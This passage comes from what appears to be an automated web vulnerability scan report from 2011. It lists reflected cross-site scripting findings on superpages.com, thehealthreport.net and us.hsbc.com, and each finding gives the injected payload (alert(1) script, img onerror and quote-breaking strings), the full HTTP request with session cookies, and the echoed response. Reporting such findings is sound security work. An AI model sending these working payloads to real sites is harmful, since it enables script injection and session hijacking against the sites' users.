s.prop5 = "Advanced Search, Business Profile";
s.prop9 = "Advanced Search";
s.eVar23 = "Advanced Search";
s.hier1 = "Advanced Search, Business Profile";
var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516";
if(s_campaign){
s.campaign = s_campaign;
}
var s_code = s.t();
if(s_code)
document.writeln(s_code);
//-->
...[SNIP]...

1.519. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [TR parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the TR request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 843a2"-alert(1)-"a8e7c8583e3 was submitted in the TR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750623993-www.superpages.com-28426864-914831; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:23 GMT; Path=/
Set-Cookie: JSESSIONID=265FBF1301E359B78C423E3003AF80EE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:23 GMT
Connection: close
Content-Length: 23380


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1843a2"-alert(1)-"a8e7c8583e3";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.520. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [bidType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the bidType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5dd4"-alert(1)-"d9f9799ecf8 was submitted in the bidType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750603809-www.superpages.com-9081164-800011; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:03 GMT; Path=/
Set-Cookie: JSESSIONID=219F120FEB2F8290C38E110E827DE695; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:03 GMT
Content-Length: 66496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank in Philad
...[SNIP]...
archtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIKb5dd4"-alert(1)-"d9f9799ecf8&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.521. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [lbp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The value of the lbp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f71cf"-alert(1)-"8b1ed61181f was submitted in the lbp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750510916-www.superpages.com-5233303-969715; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:28:30 GMT; Path=/
Set-Cookie: JSESSIONID=742BF78E1A6BFC3ABF53A5C98640882B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:28:30 GMT
Content-Length: 60956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Ally Bank - Handlin
...[SNIP]...
= 'http://www.superpages.com';
var searchtype="two";
searchtype="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1f71cf"-alert(1)-"8b1ed61181f&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1";
var client_id = "133515049997773";
var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile';
//-->
...[SNIP]...

1.522. http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7992e"-alert(1)-"47024e3844d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750649070-www.superpages.com-20879668-932317; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:30:49 GMT; Path=/
Set-Cookie: JSESSIONID=3B2D663DFEFD640AA8C05C35E7490265; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:30:48 GMT
Content-Length: 23390


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
pe="two";
var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1&7992e"-alert(1)-"47024e3844d=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.523. http://www.superpages.com/bp/xmlproxy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /bp/xmlproxy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f53dc"-alert(1)-"b9a871a93d9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360 HTTP/1.1
Host: www.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_cc=true; s_lastvisit=1296748870245; s_pv=Business%20Profile; s_dfa=superpagescom; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:03:55 GMT
Content-Length: 57628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/bp/xmlproxyf53dc"-alert(1)-"b9a871a93d9?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D2118363360";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.524. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3b22"-alert(1)-"6172bed7d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons?f3b22"-alert(1)-"6172bed7d5b=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=14A03C36B158EBE2AE84FEB1EA46C2E7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 74692
Date: Thu, 03 Feb 2011 17:09:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h
...[SNIP]...
//yellowpages.superpages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://www.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://www.superpages.com/coupons?f3b22"-alert(1)-"6172bed7d5b=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.525. http://www.superpages.com/inc/social/sln.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /inc/social/sln.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54e04"-alert(1)-"5dda26f052b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomlocal1a%26lbp%3D1%26PGID%3Ddalms102.8089.1296748577335.307646855%26bidType%3DCLIK%26TR%3D1&s=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.1 404 /inc/social/54e04&quot;-alert(1)-&quot;5dda26f052b
Server: Unspecified
Set-Cookie: JSESSIONID=E867CF351209BE67050698C0585FCB01; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:06:55 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
var hostServ = 'http://www.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://www.superpages.com/inc/social/54e04"-alert(1)-"5dda26f052b?n=5&t=Ally+Bank+in+Philadelphia%2C+PA+%7C+P+O+Box+13625%2C+Philadelphia%2C+PA&u=http://yellowpages.superpages.com%2Fbp%2FUS%2FAlly-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm%3FSRC%3Dcomloc
...[SNIP]...

1.526. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 was submitted in the REST URL parameter 2. This input was echoed as 43ba5"><img src=a onerror=alert(1)>935e0c29137 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks43ba5"><img%20src%3da%20onerror%3dalert(1)>935e0c29137 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:36 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:36GMT
Content-Length: 59492
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:36 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks43ba5"><img Src=a Onerror=alert(1)>935e0c29137 in Yellow Pages by SuperPages">
...[SNIP]...

1.527. http://www.superpages.com/yellowpages/C-Banks [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a was submitted in the REST URL parameter 2. This input was echoed as 4500c<img src=a onerror=alert(1)>46b2d68491a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks4500c<img%20src%3da%20onerror%3dalert(1)>46b2d68491a HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:45 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:46GMT
Content-Length: 58480
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:46 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a in Y
...[SNIP]...
<h1>Select a State to view Banks4500c<img Src=a Onerror=alert(1)>46b2d68491a Listings </h1>
...[SNIP]...

1.528. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf72b<img src=a onerror=alert(1)>ee7e8ccc6d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?bf72b<img%20src%3da%20onerror%3dalert(1)>ee7e8ccc6d1=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:07:06 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:07:06GMT
Content-Length: 59798
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:06 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 i
...[SNIP]...
<h1>Select a State to view Banks?bf72b<img Src=a Onerror=alert(1)>ee7e8ccc6d1=1 Listings </h1>
...[SNIP]...

1.529. http://www.superpages.com/yellowpages/C-Banks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superpages.com
Path:   /yellowpages/C-Banks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41c54"><img src=a onerror=alert(1)>2bfa6c73542 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /yellowpages/C-Banks?41c54"><img%20src%3da%20onerror%3dalert(1)>2bfa6c73542=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 17:06:55 GMT
Server: Unspecified
Vary: Host
Last-Modified: Thu, 03 Feb 2011 17:06:56GMT
Content-Length: 60810
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:21:56 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META NAME="TITLE" CONTENT="Banks?41c54"><img Src=a Onerror=alert(1)>2bfa6c73542=1 in Yellow Pages by SuperPages">
...[SNIP]...

1.530. http://www.thehealthreport.net/ac-usap.php [sub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehealthreport.net
Path:   /ac-usap.php

Issue detail

The value of the sub request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e765"><script>alert(1)</script>4ba170077e5 was submitted in the sub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ac-usap.php?sub=xyp7e765"><script>alert(1)</script>4ba170077e5 HTTP/1.1
Host: www.thehealthreport.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=7&t=7&sz=310x101&ord=1296748883062&k=banks&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Thu, 03 Feb 2011 16:04:01 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Connection: keep-alive
Content-Length: 48515

...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<!-- saved from url=(0034)http://www.channel5healthnews.net/ -->
<H
...[SNIP]...
<A href="http://ziggymedia.go2cloud.org/aff_c?offer_id=6&aff_id=1001&source=xyp7e765"><script>alert(1)</script>4ba170077e5-dp"
target=_blank>
...[SNIP]...

1.531. http://www.us.hsbc.com/1/2/3 [hp_pref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.us.hsbc.com
Path:   /1/2/3

Issue detail

The value of the hp_pref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bf5"%3balert(1)//00c0d1ff9 was submitted in the hp_pref parameter. This input was echoed as 74bf5";alert(1)//00c0d1ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1/2/3?command=makeThisMyHome&hp_pref=r74bf5"%3balert(1)//00c0d1ff9 HTTP/1.1
Host: www.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:09:06 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Thu, 03 Feb 2011 17:10:07 GMT
Vary: User-Agent,Cookie
